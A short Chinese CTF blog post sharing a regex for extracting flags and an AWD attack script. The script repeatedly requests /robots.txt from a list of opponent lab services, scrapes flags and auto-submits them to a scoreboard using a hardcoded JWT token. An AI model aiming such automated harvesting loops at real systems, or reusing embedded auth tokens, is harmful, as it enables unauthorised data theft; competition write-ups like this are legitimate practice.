正则匹配flag

P3rh4ps发布

好吧我承认是水文
不过确实上周awd有几个洞不会匹配flag有点难受。。
a=re.findall(r'flag.*?}',x)
一个不会写正则的菜鸡的挣扎
测了下健壮性貌似确实能用-。-
补到当时的exp里就应该是这样

import requests,json,time
url=['http://192.168.7.93:20180','http://192.168.7.93:20280','http://192.168.7.93:20480','http://192.168.7.93:20580','http://192.168.7.93:20780','http://192.168.7.93:20880','http://192.168.7.93:20980','http://192.168.7.93:21180','http://192.168.7.93:21280','http://192.168.7.93:21380','http://192.168.7.93:21480','http://192.168.7.93:21580','http://192.168.7.93:21680','http://192.168.7.93:21780','http://192.168.7.93:21880']
payload='/robots.txt'
while True:
    for i in url:
        print(i)
        try:
            b=requests.get(i+payload).text
            x=re.findall(r'flag.*?}',b)
            headers = {'Content-Type': 'application/json;charset=UTF',
                       'UserAuth': 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6IlAzcmg0cHMiLCJleHAiOjE1NzU4MzM4MDIsImFkbWluIjpmYWxzZX0.S55xfIUb4sohtMFMAH2_i7tlP76-RMVLO_R26MeQPhs'}
            for a in x:
                data_json = {
                    "flag": a
                }
                #print(i)
                print(json.dumps(data_json))
                url2 = 'http://172.168.1.25:9369/submission/commit'
                res_json = requests.post(url2, data=json.dumps(data_json), headers=headers)
                print(res_json.text)

        except Exception as e:
            print('fail')
            pass
    time.sleep(301)

这次打完比赛确实有点自闭
虽然队友确实准备不充分 不过我也不是一点问题都没有
归根结底还是菜
下次努力

Post Views: 395
分类: 技术

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注

相关文章

技术

fastjson的绕过史

0x00 1.2.24初版的payload 先从初版的payload说 阅读更多…

技术

GKCTF WEBWP

node的题没做 题目难度比较适中 做的时候没写wp 所以就随手写一下 阅读更多…

技术

代码审计:PbootCMS2.07内核处理缺陷导致的一个前台任意文件包含漏洞分析

文章首发于先知社区:https://xz.aliyun.com/t/7 阅读更多…